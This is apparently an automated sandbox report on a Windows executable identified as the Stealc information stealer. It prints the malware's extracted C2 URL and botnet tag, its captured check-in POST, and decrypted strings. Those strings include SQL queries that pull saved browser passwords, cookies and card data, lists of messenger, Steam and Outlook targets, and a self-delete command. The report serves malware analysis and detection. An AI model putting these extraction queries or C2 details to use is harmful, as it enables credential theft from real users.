Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545825
MD5:1bd30bb80448545cc020f946eda1d2f2
SHA1:fdf3333834e0a0d4f2d1ed90c8179a2f76d6d512
SHA256:0eab0f6617a84d6ffdc802b19a9502e7910aace80478d15360685830c84e324e
Tags:exe, user-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1BD30BB80448545CC020F946EDA1D2F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000003.2118707985.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 5024 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 5024 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.ac0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T05:06:59.243278+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49707 | 185.215.113.206 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.ac0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: http://185.215.113.206/ | Virustotal: Detection: 18%
Source: http://185.215.113.206/6c4adf523b719729.php | Virustotal: Detection: 16%
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | Virustotal: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 0.2.file.exe.ac0000.0.unpack | String decryptor (one decrypted string per line):
  INSERT_KEY_HERE
  30
  11
  20
  24
  GetProcAddress
  LoadLibraryA
  lstrcatA
  OpenEventA
  CreateEventA
  CloseHandle
  Sleep
  GetUserDefaultLangID
  VirtualAllocExNuma
  VirtualFree
  GetSystemInfo
  VirtualAlloc
  HeapAlloc
  GetComputerNameA
  lstrcpyA
  GetProcessHeap
  GetCurrentProcess
  lstrlenA
  ExitProcess
  GlobalMemoryStatusEx
  GetSystemTime
  SystemTimeToFileTime
  advapi32.dll
  gdi32.dll
  user32.dll
  crypt32.dll
  ntdll.dll
  GetUserNameA
  CreateDCA
  GetDeviceCaps
  ReleaseDC
  CryptStringToBinaryA
  sscanf
  VMwareVMware
  HAL9TH
  JohnDoe
  DISPLAY
  %hu/%hu/%hu
  http://185.215.113.206
  bksvnsj
  /6c4adf523b719729.php
  /746f34465cf17784/
  tale
  GetEnvironmentVariableA
  GetFileAttributesA
  GlobalLock
  HeapFree
  GetFileSize
  GlobalSize
  CreateToolhelp32Snapshot
  IsWow64Process
  Process32Next
  GetLocalTime
  FreeLibrary
  GetTimeZoneInformation
  GetSystemPowerStatus
  GetVolumeInformationA
  GetWindowsDirectoryA
  Process32First
  GetLocaleInfoA
  GetUserDefaultLocaleName
  GetModuleFileNameA
  DeleteFileA
  FindNextFileA
  LocalFree
  FindClose
  SetEnvironmentVariableA
  LocalAlloc
  GetFileSizeEx
  ReadFile
  SetFilePointer
  WriteFile
  CreateFileA
  FindFirstFileA
  CopyFileA
  VirtualProtect
  GetLogicalProcessorInformationEx
  GetLastError
  lstrcpynA
  MultiByteToWideChar
  GlobalFree
  WideCharToMultiByte
  GlobalAlloc
  OpenProcess
  TerminateProcess
  GetCurrentProcessId
  gdiplus.dll
  ole32.dll
  bcrypt.dll
  wininet.dll
  shlwapi.dll
  shell32.dll
  psapi.dll
  rstrtmgr.dll
  CreateCompatibleBitmap
  SelectObject
  BitBlt
  DeleteObject
  CreateCompatibleDC
  GdipGetImageEncodersSize
  GdipGetImageEncoders
  GdipCreateBitmapFromHBITMAP
  GdiplusStartup
  GdiplusShutdown
  GdipSaveImageToStream
  GdipDisposeImage
  GdipFree
  GetHGlobalFromStream
  CreateStreamOnHGlobal
  CoUninitialize
  CoInitialize
  CoCreateInstance
  BCryptGenerateSymmetricKey
  BCryptCloseAlgorithmProvider
  BCryptDecrypt
  BCryptSetProperty
  BCryptDestroyKey
  BCryptOpenAlgorithmProvider
  GetWindowRect
  GetDesktopWindow
  GetDC
  CloseWindow
  wsprintfA
  EnumDisplayDevicesA
  GetKeyboardLayoutList
  CharToOemW
  wsprintfW
  RegQueryValueExA
  RegEnumKeyExA
  RegOpenKeyExA
  RegCloseKey
  RegEnumValueA
  CryptBinaryToStringA
  CryptUnprotectData
  SHGetFolderPathA
  ShellExecuteExA
  InternetOpenUrlA
  InternetConnectA
  InternetCloseHandle
  InternetOpenA
  HttpSendRequestA
  HttpOpenRequestA
  InternetReadFile
  InternetCrackUrlA
  StrCmpCA
  StrStrA
  StrCmpCW
  PathMatchSpecA
  GetModuleFileNameExA
  RmStartSession
  RmRegisterResources
  RmGetList
  RmEndSession
  sqlite3_open
  sqlite3_prepare_v2
  sqlite3_step
  sqlite3_column_text
  sqlite3_finalize
  sqlite3_close
  sqlite3_column_bytes
  sqlite3_column_blob
  encrypted_key
  PATH
  C:\ProgramData\nss3.dll
  NSS_Init
  NSS_Shutdown
  PK11_GetInternalKeySlot
  PK11_FreeSlot
  PK11_Authenticate
  PK11SDR_Decrypt
  C:\ProgramData\
  SELECT origin_url, username_value, password_value FROM logins
  browser:
  profile:
  url:
  login:
  password:
  Opera
  OperaGX
  Network
  cookies
  .txt
  SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
  TRUE
  FALSE
  autofill
  SELECT name, value FROM autofill
  history
  SELECT url FROM urls LIMIT 1000
  cc
  SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
  name:
  month:
  year:
  card:
  Cookies
  Login Data
  Web Data
  History
  logins.json
  formSubmitURL
  usernameField
  encryptedUsername
  encryptedPassword
  guid
  SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
  SELECT fieldname, value FROM moz_formhistory
  SELECT url FROM moz_places LIMIT 1000
  cookies.sqlite
  formhistory.sqlite
  places.sqlite
  plugins
  Local Extension Settings
  Sync Extension Settings
  IndexedDB
  Opera Stable
  Opera GX Stable
  CURRENT
  chrome-extension_
  _0.indexeddb.leveldb
  Local State
  profiles.ini
  chrome
  opera
  firefox
  wallets
  %08lX%04lX%lu
  SOFTWARE\Microsoft\Windows NT\CurrentVersion
  ProductName
  x32
  x64
  %d/%d/%d %d:%d:%d
  HARDWARE\DESCRIPTION\System\CentralProcessor\0
  ProcessorNameString
  SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
  DisplayName
  DisplayVersion
  Network Info:
  - IP: IP?
  - Country: ISO?
  System Summary:
  - HWID:
  - OS:
  - Architecture:
  - UserName:
  - Computer Name:
  - Local Time:
  - UTC:
  - Language:
  - Keyboards:
  - Laptop:
  - Running Path:
  - CPU:
  - Threads:
  - Cores:
  - RAM:
  - Display Resolution:
  - GPU:
  User Agents:
  Installed Apps:
  All Users:
  Current User:
  Process List:
  system_info.txt
  freebl3.dll
  mozglue.dll
  msvcp140.dll
  nss3.dll
  softokn3.dll
  vcruntime140.dll
  \Temp\
  .exe
  runas
  open
  /c start
  %DESKTOP%
  %APPDATA%
  %LOCALAPPDATA%
  %USERPROFILE%
  %DOCUMENTS%
  %PROGRAMFILES%
  %PROGRAMFILES_86%
  %RECENT%
  *.lnk
  files
  \discord\
  \Local Storage\leveldb\CURRENT
  \Local Storage\leveldb
  \Telegram Desktop\
  key_datas
  D877F783D5D3EF8C*
  map*
  A7FDF864FBC10B77*
  A92DAA6EA6F891F2*
  F8806DD0C461824F*
  Telegram
  Tox
  *.tox
  *.ini
  Password
  Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
  00000001
  00000002
  00000003
  00000004
  \Outlook\accounts.txt
  Pidgin
  \.purple\
  accounts.xml
  dQw4w9WgXcQ
  token:
  Software\Valve\Steam
  SteamPath
  \config\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: done
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: https
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: build
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: token
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: file
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: message
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00AD9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00AC72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00ACA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00ACA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00ACC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00AD40F0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00ACE530
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00ACF7B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00AD47C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00AC1710
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00ACDB80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00AD3B00
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00AD4B60
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00ACEE20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00ACBE40
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00ACDF10

                Networking

                Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49707 -> 185.215.113.206:80
                Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKF | Host: 185.215.113.206 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 38 36 43 34 37 43 46 30 30 33 32 30 34 39 37 30 30 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 2d 2d 0d 0a | Data Ascii: ------GCBGCAFIIECBFIDHIJKF | Content-Disposition: form-data; name="hwid" | E586C47CF003204970075 | ------GCBGCAFIIECBFIDHIJKF | Content-Disposition: form-data; name="build" | tale | ------GCBGCAFIIECBFIDHIJKF--
                Source: Joe Sandbox View | IP Address: 185.215.113.206
                Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00AC62D0
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
                Source: unknown | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKF | Host: 185.215.113.206 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 38 36 43 34 37 43 46 30 30 33 32 30 34 39 37 30 30 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 2d 2d 0d 0a | Data Ascii: ------GCBGCAFIIECBFIDHIJKF | Content-Disposition: form-data; name="hwid" | E586C47CF003204970075 | ------GCBGCAFIIECBFIDHIJKF | Content-Disposition: form-data; name="build" | tale | ------GCBGCAFIIECBFIDHIJKF--
                Source: file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/-
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php2
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpK
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpR
                Source: file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpt;
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phptop
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/:
                Source: file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.2067
                Source: file.exe, file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B00098 | 0_2_00B00098
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB903E | 0_2_00DB903E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1B198 | 0_2_00B1B198
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF2138 | 0_2_00AF2138
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B04288 | 0_2_00B04288
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8925F | 0_2_00F8925F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B2E258 | 0_2_00B2E258
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3D39E | 0_2_00B3D39E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E32384 | 0_2_00E32384
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B4B308 | 0_2_00B4B308
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF54EA | 0_2_00FF54EA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B045A8 | 0_2_00B045A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B2D5A8 | 0_2_00B2D5A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F165BC | 0_2_00F165BC
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE4573 | 0_2_00AE4573
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEE544 | 0_2_00AEE544
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F12503 | 0_2_00F12503
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B496FD | 0_2_00B496FD
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B066C8 | 0_2_00B066C8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3A648 | 0_2_00B3A648
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B36799 | 0_2_00B36799
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E7379D | 0_2_00E7379D
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1D720 | 0_2_00B1D720
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC875A | 0_2_00FC875A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B198B8 | 0_2_00B198B8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1B8A8 | 0_2_00B1B8A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0B8A7 | 0_2_00F0B8A7
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B2F8D6 | 0_2_00B2F8D6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B14868 | 0_2_00B14868
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E7597A | 0_2_00E7597A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F05A65 | 0_2_00F05A65
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29BED | 0_2_00E29BED
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B34BA8 | 0_2_00B34BA8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B30B88 | 0_2_00B30B88
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B28BD9 | 0_2_00B28BD9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3AC28 | 0_2_00B3AC28
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B15DB9 | 0_2_00B15DB9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F09D84 | 0_2_00F09D84
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B14DC8 | 0_2_00B14DC8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B2AD38 | 0_2_00B2AD38
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF1D78 | 0_2_00AF1D78
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1BD68 | 0_2_00B1BD68
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF8D1B | 0_2_00EF8D1B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B31EE8 | 0_2_00B31EE8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B08E78 | 0_2_00B08E78
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F13F7E | 0_2_00F13F7E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0EF4D | 0_2_00F0EF4D
